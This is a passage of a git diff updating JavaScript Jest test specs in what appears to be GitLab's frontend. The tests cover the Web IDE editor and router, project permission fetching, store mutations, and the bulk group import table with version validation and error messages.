wrapper.vm.editor, + expect.any(EditorMarkdownExtension), + ); + } }, ); }); @@ -329,18 +329,6 @@ describe('RepoEditor', () => { expect(vm.model).toBe(existingModel); }); - it('adds callback methods', () => { - jest.spyOn(vm.editor, 'onPositionChange'); - jest.spyOn(vm.model, 'onChange'); - jest.spyOn(vm.model, 'updateOptions'); - - vm.setupEditor(); - - 
expect(vm.editor.onPositionChange).toHaveBeenCalledTimes(1); - expect(vm.model.onChange).toHaveBeenCalledTimes(1); - expect(vm.model.updateOptions).toHaveBeenCalledWith(vm.rules); - }); - it('updates state with the value of the model', () => { const newContent = 'As Gregor Samsa\n awoke one morning\n'; vm.model.setValue(newContent); @@ -366,53 +354,48 @@ describe('RepoEditor', () => { describe('editor updateDimensions', () => { let updateDimensionsSpy; - let updateDiffViewSpy; beforeEach(async () => { await createComponent(); - updateDimensionsSpy = jest.spyOn(vm.editor, 'updateDimensions'); - updateDiffViewSpy = jest.spyOn(vm.editor, 'updateDiffView').mockImplementation(); + const ext = extensionsStore.get('EditorWebIde'); + updateDimensionsSpy = jest.fn(); + spyOnApi(ext, { + updateDimensions: updateDimensionsSpy, + }); }); it('calls updateDimensions only when panelResizing is false', async () => { expect(updateDimensionsSpy).not.toHaveBeenCalled(); - expect(updateDiffViewSpy).not.toHaveBeenCalled(); expect(vm.$store.state.panelResizing).toBe(false); // default value vm.$store.state.panelResizing = true; await vm.$nextTick(); expect(updateDimensionsSpy).not.toHaveBeenCalled(); - expect(updateDiffViewSpy).not.toHaveBeenCalled(); vm.$store.state.panelResizing = false; await vm.$nextTick(); expect(updateDimensionsSpy).toHaveBeenCalledTimes(1); - expect(updateDiffViewSpy).toHaveBeenCalledTimes(1); vm.$store.state.panelResizing = true; await vm.$nextTick(); expect(updateDimensionsSpy).toHaveBeenCalledTimes(1); - expect(updateDiffViewSpy).toHaveBeenCalledTimes(1); }); it('calls updateDimensions when rightPane is toggled', async () => { expect(updateDimensionsSpy).not.toHaveBeenCalled(); - expect(updateDiffViewSpy).not.toHaveBeenCalled(); expect(vm.$store.state.rightPane.isOpen).toBe(false); // default value vm.$store.state.rightPane.isOpen = true; await vm.$nextTick(); expect(updateDimensionsSpy).toHaveBeenCalledTimes(1); - 
expect(updateDiffViewSpy).toHaveBeenCalledTimes(1); vm.$store.state.rightPane.isOpen = false; await vm.$nextTick(); expect(updateDimensionsSpy).toHaveBeenCalledTimes(2); - expect(updateDiffViewSpy).toHaveBeenCalledTimes(2); }); }); @@ -447,7 +430,11 @@ describe('RepoEditor', () => { activeFile: dummyFile.markdown, }); - updateDimensionsSpy = jest.spyOn(vm.editor, 'updateDimensions'); + const ext = extensionsStore.get('EditorWebIde'); + updateDimensionsSpy = jest.fn(); + spyOnApi(ext, { + updateDimensions: updateDimensionsSpy, + }); changeViewMode(FILE_VIEW_MODE_PREVIEW); await vm.$nextTick(); diff --git a/spec/frontend/ide/ide_router_spec.js b/spec/frontend/ide/ide_router_spec.js index 3fb7781b176..cd10812f8ea 100644 --- a/spec/frontend/ide/ide_router_spec.js +++ b/spec/frontend/ide/ide_router_spec.js @@ -6,6 +6,7 @@ describe('IDE router', () => { const PROJECT_NAMESPACE = 'my-group/sub-group'; const PROJECT_NAME = 'my-project'; const TEST_PATH = `/project/${PROJECT_NAMESPACE}/${PROJECT_NAME}/merge_requests/2`; + const DEFAULT_BRANCH = 'default-main'; let store; let router; @@ -13,34 +14,46 @@ describe('IDE router', () => { beforeEach(() => { window.history.replaceState({}, '', '/'); store = createStore(); - router = createRouter(store); + router = createRouter(store, DEFAULT_BRANCH); jest.spyOn(store, 'dispatch').mockReturnValue(new Promise(() => {})); }); - [ - `/project/${PROJECT_NAMESPACE}/${PROJECT_NAME}/tree/main/-/src/blob/`, - `/project/${PROJECT_NAMESPACE}/${PROJECT_NAME}/tree/main/-/src/blob`, - `/project/${PROJECT_NAMESPACE}/${PROJECT_NAME}/tree/blob/-/src/blob`, - `/project/${PROJECT_NAMESPACE}/${PROJECT_NAME}/tree/main/-/src/tree/`, - `/project/${PROJECT_NAMESPACE}/${PROJECT_NAME}/tree/weird:branch/name-123/-/src/tree/`, - `/project/${PROJECT_NAMESPACE}/${PROJECT_NAME}/blob/main/-/src/blob`, - `/project/${PROJECT_NAMESPACE}/${PROJECT_NAME}/blob/main/-/src/edit`, - `/project/${PROJECT_NAMESPACE}/${PROJECT_NAME}/blob/main/-/src/merge_requests/2`, - 
`/project/${PROJECT_NAMESPACE}/${PROJECT_NAME}/blob/blob/-/src/blob`, - `/project/${PROJECT_NAMESPACE}/${PROJECT_NAME}/edit/blob/-/src/blob`, - `/project/${PROJECT_NAMESPACE}/${PROJECT_NAME}/merge_requests/2`, - `/project/${PROJECT_NAMESPACE}/${PROJECT_NAME}/tree/blob`, - `/project/${PROJECT_NAMESPACE}/${PROJECT_NAME}/edit`, - `/project/${PROJECT_NAMESPACE}/${PROJECT_NAME}`, - ].forEach((route) => { - it(`finds project path when route is "${route}"`, () => { - router.push(route); - - expect(store.dispatch).toHaveBeenCalledWith('getProjectData', { - namespace: PROJECT_NAMESPACE, - projectId: PROJECT_NAME, - }); + it.each` + route | expectedBranchId | expectedBasePath + ${`/project/${PROJECT_NAMESPACE}/${PROJECT_NAME}/tree/main/-/src/blob/`} | ${'main'} | ${'src/blob/'} + ${`/project/${PROJECT_NAMESPACE}/${PROJECT_NAME}/tree/main/-/src/blob`} | ${'main'} | ${'src/blob'} + ${`/project/${PROJECT_NAMESPACE}/${PROJECT_NAME}/tree/blob/-/src/blob`} | ${'blob'} | ${'src/blob'} + ${`/project/${PROJECT_NAMESPACE}/${PROJECT_NAME}/tree/main/-/src/tree/`} | ${'main'} | ${'src/tree/'} + ${`/project/${PROJECT_NAMESPACE}/${PROJECT_NAME}/tree/weird:branch/name-123/-/src/tree/`} | ${'weird:branch/name-123'} | ${'src/tree/'} + ${`/project/${PROJECT_NAMESPACE}/${PROJECT_NAME}/blob/main/-/src/blob`} | ${'main'} | ${'src/blob'} + ${`/project/${PROJECT_NAMESPACE}/${PROJECT_NAME}/blob/main/-/src/edit`} | ${'main'} | ${'src/edit'} + ${`/project/${PROJECT_NAMESPACE}/${PROJECT_NAME}/blob/main/-/src/merge_requests/2`} | ${'main'} | ${'src/merge_requests/2'} + ${`/project/${PROJECT_NAMESPACE}/${PROJECT_NAME}/blob/blob/-/src/blob`} | ${'blob'} | ${'src/blob'} + ${`/project/${PROJECT_NAMESPACE}/${PROJECT_NAME}/edit/blob/-/src/blob`} | ${'blob'} | ${'src/blob'} + ${`/project/${PROJECT_NAMESPACE}/${PROJECT_NAME}/tree/blob`} | ${'blob'} | ${''} + ${`/project/${PROJECT_NAMESPACE}/${PROJECT_NAME}/edit`} | ${DEFAULT_BRANCH} | ${''} + ${`/project/${PROJECT_NAMESPACE}/${PROJECT_NAME}`} | 
${DEFAULT_BRANCH} | ${''} + `('correctly opens Web IDE for $route', ({ route, expectedBranchId, expectedBasePath } = {}) => { + router.push(route); + + expect(store.dispatch).toHaveBeenCalledWith('openBranch', { + projectId: `${PROJECT_NAMESPACE}/${PROJECT_NAME}`, + branchId: expectedBranchId, + basePath: expectedBasePath, + }); + }); + + it('correctly opens an MR', () => { + const expectedId = '2'; + + router.push(`/project/${PROJECT_NAMESPACE}/${PROJECT_NAME}/merge_requests/${expectedId}`); + + expect(store.dispatch).toHaveBeenCalledWith('openMergeRequest', { + projectId: `${PROJECT_NAMESPACE}/${PROJECT_NAME}`, + mergeRequestId: expectedId, + targetProjectId: undefined, }); + expect(store.dispatch).not.toHaveBeenCalledWith('openBranch'); }); it('keeps router in sync when store changes', async () => { diff --git a/spec/frontend/ide/services/index_spec.js b/spec/frontend/ide/services/index_spec.js index eacf1244d55..0fab828dfb3 100644 --- a/spec/frontend/ide/services/index_spec.js +++ b/spec/frontend/ide/services/index_spec.js @@ -6,7 +6,7 @@ import dismissUserCallout from '~/graphql_shared/mutations/dismiss_user_callout. 
import services from '~/ide/services'; import { query, mutate } from '~/ide/services/gql'; import { escapeFileUrl } from '~/lib/utils/url_utility'; -import ciConfig from '~/pipeline_editor/graphql/queries/ci_config.graphql'; +import ciConfig from '~/pipeline_editor/graphql/queries/ci_config.query.graphql'; import { projectData } from '../mock_data'; jest.mock('~/api'); @@ -216,29 +216,6 @@ describe('IDE services', () => { ); }); - describe('getProjectData', () => { - it('combines gql and API requests', () => { - const gqlProjectData = { - userPermissions: { - bogus: true, - }, - }; - Api.project.mockReturnValue(Promise.resolve({ data: { ...projectData } })); - query.mockReturnValue(Promise.resolve({ data: { project: gqlProjectData } })); - - return services.getProjectData(TEST_NAMESPACE, TEST_PROJECT).then((response) => { - expect(response).toEqual({ data: { ...projectData, ...gqlProjectData } }); - expect(Api.project).toHaveBeenCalledWith(TEST_PROJECT_ID); - expect(query).toHaveBeenCalledWith({ - query: getIdeProject, - variables: { - projectPath: TEST_PROJECT_ID, - }, - }); - }); - }); - }); - describe('getFiles', () => { let mock; let relativeUrlRoot; @@ -330,4 +307,38 @@ describe('IDE services', () => { }); }); }); + + describe('getProjectPermissionsData', () => { + const TEST_PROJECT_PATH = 'foo/bar'; + + it('queries for the project permissions', () => { + const result = { data: { project: projectData } }; + query.mockResolvedValue(result); + + return services.getProjectPermissionsData(TEST_PROJECT_PATH).then((data) => { + expect(data).toEqual(result.data.project); + expect(query).toHaveBeenCalledWith( + expect.objectContaining({ + query: getIdeProject, + variables: { projectPath: TEST_PROJECT_PATH }, + }), + ); + }); + }); + + it('converts the returned GraphQL id to the regular ID number', () => { + const projectId = 2; + const gqlProjectData = { + id: `gid://gitlab/Project/${projectId}`, + userPermissions: { + bogus: true, + }, + }; + + 
query.mockResolvedValue({ data: { project: gqlProjectData } }); + return services.getProjectPermissionsData(TEST_PROJECT_PATH).then((data) => { + expect(data.id).toBe(projectId); + }); + }); + }); }); diff --git a/spec/frontend/ide/stores/actions/project_spec.js b/spec/frontend/ide/stores/actions/project_spec.js index ca6f7169059..e07dcf22860 100644 --- a/spec/frontend/ide/stores/actions/project_spec.js +++ b/spec/frontend/ide/stores/actions/project_spec.js @@ -2,9 +2,12 @@ import MockAdapter from 'axios-mock-adapter'; import { useMockLocationHelper } from 'helpers/mock_window_location_helper'; import testAction from 'helpers/vuex_action_helper'; import api from '~/api'; +import createFlash from '~/flash'; import service from '~/ide/services'; import { createStore } from '~/ide/stores'; import { + setProject, + fetchProjectPermissions, refreshLastCommitData, showBranchNotFoundError, createNewBranchFromDefault, @@ -13,8 +16,12 @@ import { loadFile, loadBranch, } from '~/ide/stores/actions'; +import { logError } from '~/lib/logger'; import axios from '~/lib/utils/axios_utils'; +jest.mock('~/flash'); +jest.mock('~/lib/logger'); + const TEST_PROJECT_ID = 'abc/def'; describe('IDE store project actions', () => { @@ -34,6 +41,92 @@ describe('IDE store project actions', () => { mock.restore(); }); + describe('setProject', () => { + const project = { id: 'foo', path_with_namespace: TEST_PROJECT_ID }; + const baseMutations = [ + { + type: 'SET_PROJECT', + payload: { + projectPath: TEST_PROJECT_ID, + project, + }, + }, + { + type: 'SET_CURRENT_PROJECT', + payload: TEST_PROJECT_ID, + }, + ]; + + it.each` + desc | payload | expectedMutations + ${'does not commit any action if project is not passed'} | ${undefined} | ${[]} + ${'commits correct actions in the correct order by default'} | ${{ project }} | ${[...baseMutations]} + `('$desc', async ({ payload, expectedMutations } = {}) => { + await testAction({ + action: setProject, + payload, + state: store.state, + 
expectedMutations, + expectedActions: [], + }); + }); + }); + + describe('fetchProjectPermissions', () => { + const permissionsData = { + userPermissions: { + bogus: true, + }, + }; + const permissionsMutations = [ + { + type: 'UPDATE_PROJECT', + payload: { + projectPath: TEST_PROJECT_ID, + props: { + ...permissionsData, + }, + }, + }, + ]; + + let spy; + + beforeEach(() => { + spy = jest.spyOn(service, 'getProjectPermissionsData'); + }); + + afterEach(() => { + createFlash.mockRestore(); + }); + + it.each` + desc | projectPath | responseSuccess | expectedMutations + ${'does not fetch permissions if project does not exist'} | ${undefined} | ${true} | ${[]} + ${'fetches permission when project is specified'} | ${TEST_PROJECT_ID} | ${true} | ${[...permissionsMutations]} + ${'flashes an error if the request fails'} | ${TEST_PROJECT_ID} | ${false} | ${[]} + `('$desc', async ({ projectPath, expectedMutations, responseSuccess } = {}) => { + store.state.currentProjectId = projectPath; + if (responseSuccess) { + spy.mockResolvedValue(permissionsData); + } else { + spy.mockRejectedValue(); + } + + await testAction({ + action: fetchProjectPermissions, + state: store.state, + expectedMutations, + expectedActions: [], + }); + + if (!responseSuccess) { + expect(logError).toHaveBeenCalled(); + expect(createFlash).toHaveBeenCalled(); + } + }); + }); + describe('refreshLastCommitData', () => { beforeEach(() => { store.state.currentProjectId = 'abc/def'; diff --git a/spec/frontend/ide/stores/mutations/project_spec.js b/spec/frontend/ide/stores/mutations/project_spec.js index b3ce39c33d2..0fdd7798f00 100644 --- a/spec/frontend/ide/stores/mutations/project_spec.js +++ b/spec/frontend/ide/stores/mutations/project_spec.js @@ -3,21 +3,48 @@ import state from '~/ide/stores/state'; describe('Multi-file store branch mutations', () => { let localState; + const nonExistentProj = 'nonexistent'; + const existingProj = 'abcproject'; beforeEach(() => { localState = state(); - localState.projects 
= { abcproject: { empty_repo: true } }; + localState.projects = { [existingProj]: { empty_repo: true } }; }); describe('TOGGLE_EMPTY_STATE', () => { it('sets empty_repo for project to passed value', () => { - mutations.TOGGLE_EMPTY_STATE(localState, { projectPath: 'abcproject', value: false }); + mutations.TOGGLE_EMPTY_STATE(localState, { projectPath: existingProj, value: false }); - expect(localState.projects.abcproject.empty_repo).toBe(false); + expect(localState.projects[existingProj].empty_repo).toBe(false); - mutations.TOGGLE_EMPTY_STATE(localState, { projectPath: 'abcproject', value: true }); + mutations.TOGGLE_EMPTY_STATE(localState, { projectPath: existingProj, value: true }); - expect(localState.projects.abcproject.empty_repo).toBe(true); + expect(localState.projects[existingProj].empty_repo).toBe(true); + }); + }); + + describe('UPDATE_PROJECT', () => { + it.each` + desc | projectPath | props | expectedProps + ${'extends existing project with the passed props'} | ${existingProj} | ${{ foo1: 'bar' }} | ${{ foo1: 'bar' }} + ${'overrides existing props on the exsiting project'} | ${existingProj} | ${{ empty_repo: false }} | ${{ empty_repo: false }} + ${'does nothing if the project does not exist'} | ${nonExistentProj} | ${{ foo2: 'bar' }} | ${undefined} + ${'does nothing if project is not passed'} | ${undefined} | ${{ foo3: 'bar' }} | ${undefined} + ${'does nothing if the props are not passed'} | ${existingProj} | ${undefined} | ${{}} + ${'does nothing if the props are empty'} | ${existingProj} | ${{}} | ${{}} + `('$desc', ({ projectPath, props, expectedProps } = {}) => { + const origProject = localState.projects[projectPath]; + + mutations.UPDATE_PROJECT(localState, { projectPath, props }); + + if (!expectedProps) { + expect(localState.projects[projectPath]).toBeUndefined(); + } else { + expect(localState.projects[projectPath]).toEqual({ + ...origProject, + ...expectedProps, + }); + } }); }); }); diff --git 
a/spec/frontend/import_entities/import_groups/components/import_table_spec.js b/spec/frontend/import_entities/import_groups/components/import_table_spec.js index 6e3df21e30a..b17ff2e0f52 100644 --- a/spec/frontend/import_entities/import_groups/components/import_table_spec.js +++ b/spec/frontend/import_entities/import_groups/components/import_table_spec.js @@ -1,4 +1,4 @@ -import { GlEmptyState, GlLoadingIcon } from '@gitlab/ui'; +import { GlAlert, GlEmptyState, GlLoadingIcon } from '@gitlab/ui'; import { mount } from '@vue/test-utils'; import Vue, { nextTick } from 'vue'; import VueApollo from 'vue-apollo'; @@ -33,13 +33,23 @@ describe('import table', () => { generateFakeEntry({ id: 2, status: STATUSES.FINISHED }), ]; const FAKE_PAGE_INFO = { page: 1, perPage: 20, total: 40, totalPages: 2 }; + const FAKE_VERSION_VALIDATION = { + features: { + projectMigration: { available: false, minVersion: '14.8.0' }, + sourceInstanceVersion: '14.6.0', + }, + }; const findImportSelectedButton = () => wrapper.findAll('button').wrappers.find((w) => w.text() === 'Import selected'); const findImportButtons = () => wrapper.findAll('button').wrappers.filter((w) => w.text() === 'Import'); - const findPaginationDropdown = () => wrapper.find('[aria-label="Page size"]'); + const findPaginationDropdown = () => wrapper.find('[data-testid="page-size"]'); const findPaginationDropdownText = () => findPaginationDropdown().find('button').text(); + const findSelectionCount = () => wrapper.find('[data-test-id="selection-count"]'); + + const triggerSelectAllCheckbox = () => + wrapper.find('thead input[type=checkbox]').trigger('click'); const selectRow = (idx) => wrapper.findAll('tbody td input[type=checkbox]').at(idx).trigger('click'); @@ -104,6 +114,7 @@ describe('import table', () => { bulkImportSourceGroups: () => ({ nodes: [], pageInfo: FAKE_PAGE_INFO, + versionValidation: FAKE_VERSION_VALIDATION, }), }); await waitForPromises(); @@ -117,6 +128,7 @@ describe('import table', () => { 
bulkImportSourceGroups: () => ({ nodes: FAKE_GROUPS, pageInfo: FAKE_PAGE_INFO, + versionValidation: FAKE_VERSION_VALIDATION, }), }); await waitForPromises(); @@ -129,6 +141,7 @@ describe('import table', () => { bulkImportSourceGroups: jest.fn().mockResolvedValue({ nodes: [], pageInfo: FAKE_PAGE_INFO, + versionValidation: FAKE_VERSION_VALIDATION, }), }); await waitForPromises(); @@ -138,7 +151,11 @@ describe('import table', () => { it('invokes importGroups mutation when row button is clicked', async () => { createComponent({ - bulkImportSourceGroups: () => ({ nodes: [FAKE_GROUP], pageInfo: FAKE_PAGE_INFO }), + bulkImportSourceGroups: () => ({ + nodes: [FAKE_GROUP], + pageInfo: FAKE_PAGE_INFO, + versionValidation: FAKE_VERSION_VALIDATION, + }), }); jest.spyOn(apolloProvider.defaultClient, 'mutate'); @@ -162,7 +179,11 @@ describe('import table', () => { it('displays error if importing group fails', async () => { createComponent({ - bulkImportSourceGroups: () => ({ nodes: [FAKE_GROUP], pageInfo: FAKE_PAGE_INFO }), + bulkImportSourceGroups: () => ({ + nodes: [FAKE_GROUP], + pageInfo: FAKE_PAGE_INFO, + versionValidation: FAKE_VERSION_VALIDATION, + }), importGroups: () => { throw new Error(); }, @@ -182,9 +203,11 @@ describe('import table', () => { }); describe('pagination', () => { - const bulkImportSourceGroupsQueryMock = jest - .fn() - .mockResolvedValue({ nodes: [FAKE_GROUP], pageInfo: FAKE_PAGE_INFO }); + const bulkImportSourceGroupsQueryMock = jest.fn().mockResolvedValue({ + nodes: [FAKE_GROUP], + pageInfo: FAKE_PAGE_INFO, + versionValidation: FAKE_VERSION_VALIDATION, + }); beforeEach(() => { createComponent({ @@ -205,7 +228,13 @@ describe('import table', () => { const otherOption = findPaginationDropdown().findAll('li p').at(1); expect(otherOption.text()).toMatchInterpolatedText('50 items per page'); + bulkImportSourceGroupsQueryMock.mockResolvedValue({ + nodes: [FAKE_GROUP], + pageInfo: { ...FAKE_PAGE_INFO, perPage: 50 }, + versionValidation: 
FAKE_VERSION_VALIDATION, + }); await otherOption.trigger('click'); + await waitForPromises(); expect(findPaginationDropdownText()).toMatchInterpolatedText('50 items per page'); @@ -234,6 +263,7 @@ describe('import table', () => { perPage: 20, totalPages: 2, }, + versionValidation: FAKE_VERSION_VALIDATION, }); wrapper.find(PaginationLinks).props().change(REQUESTED_PAGE); await waitForPromises(); @@ -243,9 +273,11 @@ describe('import table', () => { }); describe('filters', () => { - const bulkImportSourceGroupsQueryMock = jest - .fn() - .mockResolvedValue({ nodes: [FAKE_GROUP], pageInfo: FAKE_PAGE_INFO }); + const bulkImportSourceGroupsQueryMock = jest.fn().mockResolvedValue({ + nodes: [FAKE_GROUP], + pageInfo: FAKE_PAGE_INFO, + versionValidation: FAKE_VERSION_VALIDATION, + }); beforeEach(() => { createComponent({ @@ -313,11 +345,28 @@ describe('import table', () => { }); describe('bulk operations', () => { + it('import all button correctly selects/deselects all groups', async () => { + createComponent({ + bulkImportSourceGroups: () => ({ + nodes: FAKE_GROUPS, + pageInfo: FAKE_PAGE_INFO, + versionValidation: FAKE_VERSION_VALIDATION, + }), + }); + await waitForPromises(); + expect(findSelectionCount().text()).toMatchInterpolatedText('0 selected'); + await triggerSelectAllCheckbox(); + expect(findSelectionCount().text()).toMatchInterpolatedText('2 selected'); + await triggerSelectAllCheckbox(); + expect(findSelectionCount().text()).toMatchInterpolatedText('0 selected'); + }); + it('import selected button is disabled when no groups selected', async () => { createComponent({ bulkImportSourceGroups: () => ({ nodes: FAKE_GROUPS, pageInfo: FAKE_PAGE_INFO, + versionValidation: FAKE_VERSION_VALIDATION, }), }); await waitForPromises(); @@ -330,6 +379,7 @@ describe('import table', () => { bulkImportSourceGroups: () => ({ nodes: FAKE_GROUPS, pageInfo: FAKE_PAGE_INFO, + versionValidation: FAKE_VERSION_VALIDATION, }), }); await waitForPromises(); @@ -346,6 +396,7 @@ 
describe('import table', () => { bulkImportSourceGroups: () => ({ nodes: NEW_GROUPS, pageInfo: FAKE_PAGE_INFO, + versionValidation: FAKE_VERSION_VALIDATION, }), }); await waitForPromises(); @@ -368,6 +419,7 @@ describe('import table', () => { bulkImportSourceGroups: () => ({ nodes: NEW_GROUPS, pageInfo: FAKE_PAGE_INFO, + versionValidation: FAKE_VERSION_VALIDATION, }), }); await waitForPromises(); @@ -391,6 +443,7 @@ describe('import table', () => { bulkImportSourceGroups: () => ({ nodes: NEW_GROUPS, pageInfo: FAKE_PAGE_INFO, + versionValidation: FAKE_VERSION_VALIDATION, }), }); jest.spyOn(apolloProvider.defaultClient, 'mutate'); @@ -421,4 +474,38 @@ describe('import table', () => { }); }); }); + + describe('unavailable features warning', () => { + it('renders alert when there are unavailable features', async () => { + createComponent({ + bulkImportSourceGroups: () => ({ + nodes: FAKE_GROUPS, + pageInfo: FAKE_PAGE_INFO, + versionValidation: FAKE_VERSION_VALIDATION, + }), + }); + await waitForPromises(); + + expect(wrapper.find(GlAlert).exists()).toBe(true); + expect(wrapper.find(GlAlert).text()).toContain('projects (require v14.8.0)'); + }); + + it('does not renders alert when there are no unavailable features', async () => { + createComponent({ + bulkImportSourceGroups: () => ({ + nodes: FAKE_GROUPS, + pageInfo: FAKE_PAGE_INFO, + versionValidation: { + features: { + projectMigration: { available: true, minVersion: '14.8.0' }, + sourceInstanceVersion: '14.6.0', + }, + }, + }), + }); + await waitForPromises(); + + expect(wrapper.find(GlAlert).exists()).toBe(false); + }); + }); }); diff --git a/spec/frontend/import_entities/import_groups/components/import_target_cell_spec.js b/spec/frontend/import_entities/import_groups/components/import_target_cell_spec.js index 3c2367e22f5..d3f86672f33 100644 --- a/spec/frontend/import_entities/import_groups/components/import_target_cell_spec.js +++ b/spec/frontend/import_entities/import_groups/components/import_target_cell_spec.js 
@@ -123,13 +123,22 @@ describe('import target cell', () => { }); describe('when entity is available for import', () => { + const FAKE_PROGRESS_MESSAGE = 'progress message'; beforeEach(() => { - group = generateFakeTableEntry({ id: 1, flags: { isAvailableForImport: true } }); + group = generateFakeTableEntry({ + id: 1, + flags: { isAvailableForImport: true }, + progress: { message: FAKE_PROGRESS_MESSAGE }, + }); createComponent({ group }); }); it('renders namespace dropdown as enabled', () => { expect(findNamespaceDropdown().attributes('disabled')).toBe(undefined); }); + + it('renders progress message as error if it exists', () => { + expect(wrapper.find('[role=alert]').text()).toBe(FAKE_PROGRESS_MESSAGE); + }); }); }); diff --git a/spec/frontend/import_entities/import_groups/graphql/client_factory_spec.js b/spec/frontend/import_entities/import_groups/graphql/client_factory_spec.js index f3447494578..c6ddce17fe4 100644 --- a/spec/frontend/import_entities/import_groups/graphql/client_factory_spec.js +++ b/spec/frontend/import_entities/import_groups/graphql/client_factory_spec.js @@ -163,12 +163,34 @@ describe('Bulk import resolvers', () => { }); describe('mutations', () => { - beforeEach(() => { - axiosMockAdapter.onPost(FAKE_ENDPOINTS.createBulkImport).reply(httpStatus.OK, { id: 1 }); - }); + beforeEach(() => {}); describe('importGroup', () => { - it('sets import status to CREATED when request completes', async () => { + it('sets import status to CREATED for successful groups when request completes', async () => { + axiosMockAdapter + .onPost(FAKE_ENDPOINTS.createBulkImport) + .reply(httpStatus.OK, [{ success: true, id: 1 }]); + + await client.mutate({ + mutation: importGroupsMutation, + variables: { + importRequests: [ + { + sourceGroupId: statusEndpointFixture.importable_data[0].id, + newName: 'test', + targetNamespace: 'root', + }, + ], + }, + }); + + await axios.waitForAll(); + expect(results[0].progress.status).toBe(STATUSES.CREATED); + }); + + it('sets import 
status to CREATED for successful groups when request completes with legacy response', async () => { + axiosMockAdapter.onPost(FAKE_ENDPOINTS.createBulkImport).reply(httpStatus.OK, { id: 1 }); + await client.mutate({ mutation: importGroupsMutation, variables: { @@ -185,9 +207,37 @@ describe('Bulk import resolvers', () => { await axios.waitForAll(); expect(results[0].progress.status).toBe(STATUSES.CREATED); }); + + it('sets import status to FAILED and sets progress message for failed groups when request completes', async () => { + const FAKE_ERROR_MESSAGE = 'foo'; + axiosMockAdapter + .onPost(FAKE_ENDPOINTS.createBulkImport) + .reply(httpStatus.OK, [{ success: false, id: 1, message: FAKE_ERROR_MESSAGE }]); + + await client.mutate({ + mutation: importGroupsMutation, + variables: { + importRequests: [ + { + sourceGroupId: statusEndpointFixture.importable_data[0].id, + newName: 'test', + targetNamespace: 'root', + }, + ], + }, + }); + + await axios.waitForAll(); + expect(results[0].progress.status).toBe(STATUSES.FAILED); + expect(results[0].progress.message).toBe(FAKE_ERROR_MESSAGE); + }); }); it('updateImportStatus updates status', async () => { + axiosMockAdapter + .onPost(FAKE_ENDPOINTS.createBulkImport) + .reply(httpStatus.OK, [{ success: true, id: 1 }]); + const NEW_STATUS = 'dummy'; await client.mutate({ mutation: importGroupsMutation, @@ -216,6 +266,7 @@ describe('Bulk import resolvers', () => { expect(statusInResponse).toStrictEqual({ __typename: clientTypenames.BulkImportProgress, id, + message: null, status: NEW_STATUS, }); }); diff --git a/spec/frontend/import_entities/import_groups/graphql/fixtures.js b/spec/frontend/import_entities/import_groups/graphql/fixtures.js index 5f6f9987a8f..ed4e343f331 100644 --- a/spec/frontend/import_entities/import_groups/graphql/fixtures.js +++ b/spec/frontend/import_entities/import_groups/graphql/fixtures.js @@ -1,7 +1,7 @@ import { STATUSES } from '~/import_entities/constants'; import { clientTypenames } from 
'~/import_entities/import_groups/graphql/client_factory'; -export const generateFakeEntry = ({ id, status, ...rest }) => ({ +export const generateFakeEntry = ({ id, status, message, ...rest }) => ({ __typename: clientTypenames.BulkImportSourceGroup, webUrl: `https://fake.host/${id}`, fullPath: `fake_group_${id}`, @@ -18,6 +18,7 @@ export const generateFakeEntry = ({ id, status, ...rest }) => ({ : { id, status, + message: message || '', }, ...rest, }); @@ -49,6 +50,12 @@ export const statusEndpointFixture = { web_url: 'https://gitlab.com/groups/gitlab-examples', }, ], + version_validation: { + features: { + project_migration: { available: false, min_version: '14.8.0' }, + source_instance_version: '14.6.0', + }, + }, }; export const availableNamespacesFixture = Object.freeze([ diff --git a/spec/frontend/incidents_settings/components/__snapshots__/pagerduty_form_spec.js.snap b/spec/frontend/incidents_settings/components/__snapshots__/pagerduty_form_spec.js.snap index 2a976c04319..feee14c9c40 100644 --- a/spec/frontend/incidents_settings/components/__snapshots__/pagerduty_form_spec.js.snap +++ b/spec/frontend/incidents_settings/components/__snapshots__/pagerduty_form_spec.js.snap @@ -14,6 +14,7 @@ exports[`Alert integration settings form should match the default snapshot 1`] = <gl-form-group-stub class="col-8 col-md-9 gl-p-0" labeldescription="" + optionaltext="(optional)" > <gl-toggle-stub id="active" @@ -28,10 +29,12 @@ exports[`Alert integration settings form should match the default snapshot 1`] = label="Webhook URL" label-for="url" labeldescription="" + optionaltext="(optional)" > <gl-form-input-group-stub data-testid="webhook-url" id="url" + inputclass="" predefinedoptions="[object Object]" readonly="" value="pagerduty.webhook.com" diff --git a/spec/frontend/integrations/edit/components/active_checkbox_spec.js b/spec/frontend/integrations/edit/components/active_checkbox_spec.js index df7ffd19747..0dc31616166 100644 --- 
a/spec/frontend/integrations/edit/components/active_checkbox_spec.js +++ b/spec/frontend/integrations/edit/components/active_checkbox_spec.js @@ -34,16 +34,22 @@ describe('ActiveCheckbox', () => { }); }); - describe('initialActivated is false', () => { - it('renders GlFormCheckbox as unchecked', () => { + describe('initialActivated is `false`', () => { + beforeEach(() => { createComponent({ initialActivated: false, }); + }); + it('renders GlFormCheckbox as unchecked', () => { expect(findGlFormCheckbox().exists()).toBe(true); expect(findGlFormCheckbox().vm.$attrs.checked).toBe(false); expect(findInputInCheckbox().attributes('disabled')).toBeUndefined(); }); + + it('emits `toggle-integration-active` event with `false` on mount', () => { + expect(wrapper.emitted('toggle-integration-active')[0]).toEqual([false]); + }); }); describe('initialActivated is true', () => { @@ -63,10 +69,21 @@ describe('ActiveCheckbox', () => { findInputInCheckbox().trigger('click'); await wrapper.vm.$nextTick(); - expect(findGlFormCheckbox().vm.$attrs.checked).toBe(false); }); }); + + it('emits `toggle-integration-active` event with `true` on mount', () => { + expect(wrapper.emitted('toggle-integration-active')[0]).toEqual([true]); + }); + + describe('on checkbox `change` event', () => { + it('emits `toggle-integration-active` event', () => { + findGlFormCheckbox().vm.$emit('change', false); + + expect(wrapper.emitted('toggle-integration-active')[1]).toEqual([false]); + }); + }); }); }); }); diff --git a/spec/frontend/integrations/edit/components/integration_form_spec.js b/spec/frontend/integrations/edit/components/integration_form_spec.js index 0a9cbadb249..4c1394f3a87 100644 --- a/spec/frontend/integrations/edit/components/integration_form_spec.js +++ b/spec/frontend/integrations/edit/components/integration_form_spec.js @@ -1,6 +1,8 @@ +import axios from 'axios'; +import MockAdapter from 'axios-mock-adapter'; +import * as Sentry from '@sentry/browser'; import { setHTMLFixture } from 
